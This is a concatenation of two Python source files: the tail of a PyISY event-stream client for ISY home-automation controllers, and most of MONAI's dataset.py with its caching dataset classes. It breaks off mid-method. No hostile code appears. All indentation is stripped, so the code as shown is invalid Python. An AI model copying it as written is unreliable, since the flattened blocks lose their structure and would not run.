features = xmldoc.getElementsByTagName('Event')
self.data['sid'] = features[0].attributes['sid'].value
self.parent.log.debug('ISY Updated Events Stream ID')
@property
def running(self):
try:
return self._thread.isAlive()
except:
return False
@running.setter
def running(self, val):
if val and not self.running:
self.parent.log.info('ISY Starting Updates')
if self.connect():
self.subscribe()
self._running = True
self._thread = Thread(target=self.watch)
self._thread.daemon = True
self._thread.start()
else:
self.parent.log.info('ISY Stopping Updates')
self._running = False
self.unsubscribe()
self.disconnect()
def read(self):
if self._reader is None:
self._NIYerror()
else:
loop = True
output = ''
while loop:
try:
new_data = self.socket.recv(4096)
except ssl.SSLWantReadError:
pass
except socket.error:
loop = False
else:
if sys.version_info.major == 3:
new_data = new_data.decode('utf-8')
output += new_data
if len(new_data) * 8 < 4096:
loop = False
return output.split('\n')
def write(self, msg):
if self._writer is None:
self._NIYerror()
else:
self._writer.write(msg)
self._writer.flush()
def connect(self):
if not self._connected:
try:
self.socket.connect((self.data['addr'], self.data['port']))
self.cert = self.socket.getpeercert()
except OSError:
self.parent.log.error('PyISY could not connect to ISY ' +
'event stream.')
if self._lostfun is not None:
self._lostfun()
return False
self.socket.setblocking(0)
self._reader = self.socket.makefile("r")
self._writer = self.socket.makefile("w")
self._connected = True
return True
else:
return True
def disconnect(self):
if self._connected:
self.socket.close()
self._connected = False
self._subscribed = False
self._running = False
def subscribe(self):
if not self._subscribed and self._connected:
if 'sid' not in self.data:
msg = self._mkmsg(strings.sub_msg)
self.write(msg)
else:
msg = self._mkmsg(strings.resub_msg)
self.write(msg)
self._subscribed = True
def unsubscribe(self):
if self._subscribed and self._connected:
msg = self._mkmsg(strings.unsub_msg)
self.write(msg)
self._subscribed = False
self.disconnect()
@property
def heartbeat_time(self):
if self._lasthb is not None:
return (datetime.datetime.now() - self._lasthb).seconds
else:
return 0.
def watch(self):
if self._subscribed:
while self._running and self._subscribed:
# verify connection is still alive
if self.heartbeat_time > self._hbwait:
self.disconnect()
self.parent.log.warning('PyISY lost connection to '
+ 'the ISY event stream.')
if self._lostfun is not None:
self._lostfun()
# poll socket for new data
inready, _, _ = \
select.select([self.socket], [], [], POLL_TIME)
#if self.socket in inready:
if self.socket in inready:
for data in self.read():
if data.startswith('<?xml'):
data = data.strip().replace('POST reuse HTTP/1.1', '')
self._routemsg(data)
|
dataset.py
|
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections.abc
import math
import pickle
import shutil
import sys
import tempfile
import threading
import time
import warnings
from copy import copy, deepcopy
from multiprocessing.pool import ThreadPool
from pathlib import Path
from typing import IO, TYPE_CHECKING, Any, Callable, Dict, List, Optional, Sequence, Union
import numpy as np
import torch
from torch.utils.data import Dataset as _TorchDataset
from torch.utils.data import Subset
from monai.data.utils import convert_tables_to_dicts, pickle_hashing
from monai.transforms import Compose, Randomizable, ThreadUnsafe, Transform, apply_transform
from monai.utils import MAX_SEED, ensure_tuple, get_seed, min_version, optional_import
from monai.utils.misc import first
if TYPE_CHECKING:
from tqdm import tqdm
has_tqdm = True
else:
tqdm, has_tqdm = optional_import("tqdm", "4.47.0", min_version, "tqdm")
lmdb, _ = optional_import("lmdb")
pd, _ = optional_import("pandas")
class Dataset(_TorchDataset):
"""
A generic dataset with a length property and an optional callable data transform
when fetching a data sample.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, typical input data can be a list of dictionaries::
[{ { {
'img': 'image1.nii.gz', 'img': 'image2.nii.gz', 'img': 'image3.nii.gz',
'seg': 'label1.nii.gz', 'seg': 'label2.nii.gz', 'seg': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
"""
def __init__(self, data: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: a callable data transform on input data.
"""
self.data = data
self.transform = transform
def __len__(self) -> int:
return len(self.data)
def _transform(self, index: int):
"""
Fetch single data item from `self.data`.
"""
data_i = self.data[index]
return apply_transform(self.transform, data_i) if self.transform is not None else data_i
def __getitem__(self, index: Union[int, slice, Sequence[int]]):
"""
Returns a `Subset` if `index` is a slice or Sequence, a data item otherwise.
"""
if isinstance(index, slice):
# dataset[:42]
start, stop, step = index.indices(len(self))
indices = range(start, stop, step)
return Subset(dataset=self, indices=indices)
if isinstance(index, collections.abc.Sequence):
# dataset[[1, 3, 4]]
return Subset(dataset=self, indices=index)
return self._transform(index)
class PersistentDataset(Dataset):
"""
Persistent storage of pre-computed values to efficiently manage larger than memory dictionary format data,
it can operate transforms for specific fields. Results from the non-random transform components are computed
when first used, and stored in the `cache_dir` for rapid retrieval on subsequent uses.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
For example, typical input data can be a list of dictionaries::
[{ { {
'image': 'image1.nii.gz', 'image': 'image2.nii.gz', 'image': 'image3.nii.gz',
'label': 'label1.nii.gz', 'label': 'label2.nii.gz', 'label': 'label3.nii.gz',
'extra': 123 'extra': 456 'extra': 789
}, }, }]
For a composite transform like
.. code-block:: python
[ LoadImaged(keys=['image', 'label']),
Orientationd(keys=['image', 'label'], axcodes='RAS'),
ScaleIntensityRanged(keys=['image'], a_min=-57, a_max=164, b_min=0.0, b_max=1.0, clip=True),
RandCropByPosNegLabeld(keys=['image', 'label'], label_key='label', spatial_size=(96, 96, 96),
pos=1, neg=1, num_samples=4, image_key='image', image_threshold=0),
ToTensord(keys=['image', 'label'])]
Upon first use a filename based dataset will be processed by the transform for the
[LoadImaged, Orientationd, ScaleIntensityRanged] and the resulting tensor written to
the `cache_dir` before applying the remaining random dependant transforms
[RandCropByPosNegLabeld, ToTensord] elements for use in the analysis.
Subsequent uses of a dataset directly read pre-processed results from `cache_dir`
followed by applying the random dependant parts of transform processing.
During training call `set_data()` to update input data and recompute cache content.
Note:
The input data must be a list of file paths and will hash them as cache keys.
When loading persistent cache content, it can't guarantee the cached data matches current
transform chain, so please make sure to use exactly the same non-random transforms and the
args as the cache content, otherwise, it may cause unexpected errors.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.cache_dir = Path(cache_dir) if cache_dir is not None else None
self.hash_func = hash_func
if self.cache_dir is not None:
if not self.cache_dir.exists():
self.cache_dir.mkdir(parents=True, exist_ok=True)
if not self.cache_dir.is_dir():
raise ValueError("cache_dir must be a directory.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
self.data = data
if self.cache_dir is not None and self.cache_dir.exists():
shutil.rmtree(self.cache_dir, ignore_errors=True)
self.cache_dir.mkdir(parents=True, exist_ok=True)
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the first random element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the first identified
random transform object
"""
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
# this is to be consistent with CacheDataset even though it's not in a multi-thread situation.
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the first random transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first random transform)
Returns:
the transformed element through the random transforms
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
start_post_randomize_run = False
for _transform in self.transform.transforms:
if (
start_post_randomize_run
or isinstance(_transform, Randomizable)
or not isinstance(_transform, Transform)
):
start_post_randomize_run = True
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
def _cachecheck(self, item_transformed):
"""
A function to cache the expensive input data transform operations
so that huge data sets (larger than computer memory) can be processed
on the fly as needed, and intermediate results written to disk for
future use.
Args:
item_transformed: The current data element to be mutated into transformed representation
Returns:
The transformed data_element, either from cache, or explicitly computing it.
Warning:
The current implementation does not encode transform information as part of the
hashing mechanism used for generating cache names. If the transforms applied are
changed in any way, the objects in the cache dir will be invalid. The hash for the
cache is ONLY dependant on the input filename paths.
"""
hashfile = None
if self.cache_dir is not None:
data_item_md5 = self.hash_func(item_transformed).decode("utf-8")
hashfile = self.cache_dir / f"{data_item_md5}.pt"
if hashfile is not None and hashfile.is_file(): # cache hit
try:
return torch.load(hashfile)
except PermissionError as e:
if sys.platform != "win32":
raise e
_item_transformed = self._pre_transform(deepcopy(item_transformed)) # keep the original hashed
if hashfile is not None:
# NOTE: Writing to a temporary directory and then using a nearly atomic rename operation
# to make the cache more robust to manual killing of parent process
# which may leave partially written cache files in an incomplete state
with tempfile.TemporaryDirectory() as tmpdirname:
temp_hash_file = Path(tmpdirname) / hashfile.name
torch.save(_item_transformed, temp_hash_file)
if temp_hash_file.is_file() and not hashfile.is_file():
# On Unix, if target exists and is a file, it will be replaced silently if the user has permission.
# for more details: https://docs.python.org/3/library/shutil.html#shutil.move.
try:
shutil.move(temp_hash_file, hashfile)
except FileExistsError:
pass
return _item_transformed
def _transform(self, index: int):
pre_random_item = self._cachecheck(self.data[index])
return self._post_transform(pre_random_item)
class CacheNTransDataset(PersistentDataset):
"""
Extension of `PersistentDataset`, tt can also cache the result of first N transforms, no matter it's random or not.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_n_trans: int,
cache_dir: Optional[Union[Path, str]],
hash_func: Callable[..., bytes] = pickle_hashing,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`PersistentDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_n_trans: cache the result of first N transforms.
cache_dir: If specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If `cache_dir` doesn't exist, will automatically create it.
If `cache_dir` is `None`, there is effectively no caching.
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.cache_n_trans = cache_n_trans
def _pre_transform(self, item_transformed):
"""
Process the data from original state up to the N element.
Args:
item_transformed: The data to be transformed
Returns:
the transformed element up to the N transform object
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i == self.cache_n_trans:
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item_transformed = apply_transform(_xform, item_transformed)
return item_transformed
def _post_transform(self, item_transformed):
"""
Process the data from before the N + 1 transform to the final state ready for evaluation.
Args:
item_transformed: The data to be transformed (already processed up to the first N transform)
Returns:
the final transformed result
"""
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for i, _transform in enumerate(self.transform.transforms):
if i >= self.cache_n_trans:
item_transformed = apply_transform(_transform, item_transformed)
return item_transformed
class LMDBDataset(PersistentDataset):
"""
Extension of `PersistentDataset` using LMDB as the backend.
See Also:
:py:class:`monai.data.PersistentDataset`
Examples:
>>> items = [{"data": i} for i in range(5)]
# [{'data': 0}, {'data': 1}, {'data': 2}, {'data': 3}, {'data': 4}]
>>> lmdb_ds = monai.data.LMDBDataset(items, transform=monai.transforms.SimulateDelayd("data", delay_time=1))
>>> print(list(lmdb_ds)) # using the cached results
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_dir: Union[Path, str] = "cache",
hash_func: Callable[..., bytes] = pickle_hashing,
db_name: str = "monai_cache",
progress: bool = True,
pickle_protocol=pickle.HIGHEST_PROTOCOL,
lmdb_kwargs: Optional[dict] = None,
) -> None:
"""
Args:
data: input data file paths to load and transform to generate dataset for model.
`LMDBDataset` expects input data to be a list of serializable
and hashes them as cache keys using `hash_func`.
transform: transforms to execute operations on input data.
cache_dir: if specified, this is the location for persistent storage
of pre-computed transformed data tensors. The cache_dir is computed once, and
persists on disk until explicitly removed. Different runs, programs, experiments
may share a common cache dir provided that the transforms pre-processing is consistent.
If the cache_dir doesn't exist, will automatically create it. Defaults to "./cache".
hash_func: a callable to compute hash from data items to be cached.
defaults to `monai.data.utils.pickle_hashing`.
db_name: lmdb database file name. Defaults to "monai_cache".
progress: whether to display a progress bar.
pickle_protocol: pickle protocol version. Defaults to pickle.HIGHEST_PROTOCOL.
https://docs.python.org/3/library/pickle.html#pickle-protocols
lmdb_kwargs: additional keyword arguments to the lmdb environment.
for more details please visit: https://lmdb.readthedocs.io/en/release/#environment-class
"""
super().__init__(data=data, transform=transform, cache_dir=cache_dir, hash_func=hash_func)
self.progress = progress
if not self.cache_dir:
raise ValueError("cache_dir must be specified.")
self.db_file = self.cache_dir / f"{db_name}.lmdb"
self.pickle_protocol = pickle_protocol
self.lmdb_kwargs = lmdb_kwargs or {}
if not self.lmdb_kwargs.get("map_size", 0):
self.lmdb_kwargs["map_size"] = 1024 ** 4 # default map_size
# lmdb is single-writer multi-reader by default
# the cache is created without multi-threading
self._read_env = None
# this runs on the primary thread/process
self._fill_cache_start_reader(show_progress=self.progress)
print(f"Accessing lmdb file: {self.db_file.absolute()}.")
def set_data(self, data: Sequence):
"""
Set the input data and delete all the out-dated cache content.
"""
super().set_data(data=data)
self._read_env = self._fill_cache_start_reader(show_progress=self.progress)
def _fill_cache_start_reader(self, show_progress=True):
"""
Check the LMDB cache and write the cache if needed. py-lmdb doesn't have a good support for concurrent write.
This method can be used with multiple processes, but it may have a negative impact on the performance.
Args:
show_progress: whether to show the progress bar if possible.
"""
# create cache
self.lmdb_kwargs["readonly"] = False
env = lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
if show_progress and not has_tqdm:
warnings.warn("LMDBDataset: tqdm is not installed. not displaying the caching progress.")
with env.begin(write=False) as search_txn:
for item in tqdm(self.data) if has_tqdm and show_progress else self.data:
key = self.hash_func(item)
done, retry, val = False, 5, None
while not done and retry > 0:
try:
with search_txn.cursor() as cursor:
done = cursor.set_key(key)
if done:
continue
if val is None:
val = self._pre_transform(deepcopy(item)) # keep the original hashed
val = pickle.dumps(val, protocol=self.pickle_protocol)
with env.begin(write=True) as txn:
txn.put(key, val)
done = True
except lmdb.MapFullError:
done, retry = False, retry - 1
size = env.info()["map_size"]
new_size = size * 2
warnings.warn(
f"Resizing the cache database from {int(size) >> 20}MB" f" to {int(new_size) >> 20}MB."
)
env.set_mapsize(new_size)
except lmdb.MapResizedError:
# the mapsize is increased by another process
# set_mapsize with a size of 0 to adopt the new size
env.set_mapsize(0)
if not done: # still has the map full error
size = env.info()["map_size"]
env.close()
raise ValueError(f"LMDB map size reached, increase size above current size of {size}.")
size = env.info()["map_size"]
env.close()
# read-only database env
self.lmdb_kwargs["readonly"] = True
self.lmdb_kwargs["map_size"] = size
if self.lmdb_kwargs.get("lock", None) is None:
self.lmdb_kwargs["lock"] = False
if self.lmdb_kwargs.get("readahead", None) is None:
self.lmdb_kwargs["readahead"] = False
return lmdb.open(path=f"{self.db_file}", subdir=False, **self.lmdb_kwargs)
def _cachecheck(self, item_transformed):
"""
if the item is not found in the lmdb file, resolves to the persistent cache default behaviour.
"""
if self._read_env is None:
# this runs on multiple processes, each one should have its own env.
self._read_env = self._fill_cache_start_reader(show_progress=False)
with self._read_env.begin(write=False) as txn:
data = txn.get(self.hash_func(item_transformed))
if data is None:
warnings.warn("LMDBDataset: cache key not found, running fallback caching.")
return super()._cachecheck(item_transformed)
try:
return pickle.loads(data)
except Exception as err:
raise RuntimeError("Invalid cache value, corrupted lmdb file?") from err
def info(self):
"""
Returns: dataset info dictionary.
"""
if self._read_env is None:
self._read_env = self._fill_cache_start_reader()
out = dict(self._read_env.info())
out["size"] = len(self.data)
out["filename"] = f"{self.db_file.absolute()}"
return out
class CacheDataset(Dataset):
"""
Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
So to improve the caching efficiency, please always put as many as possible non-random transforms
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and the outcome not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
during training. it may take a long time to prepare cache content according to the size of expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cached content
(for example, randomly crop from the cached image and deepcopy the crop region)
or if every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 3: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work for below cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data(with the same index) together in a tuple.
If the output of single dataset is already a tuple, flatten it and extend to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
And if the datasets don't have same length, use the minimum length of them as the length
of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
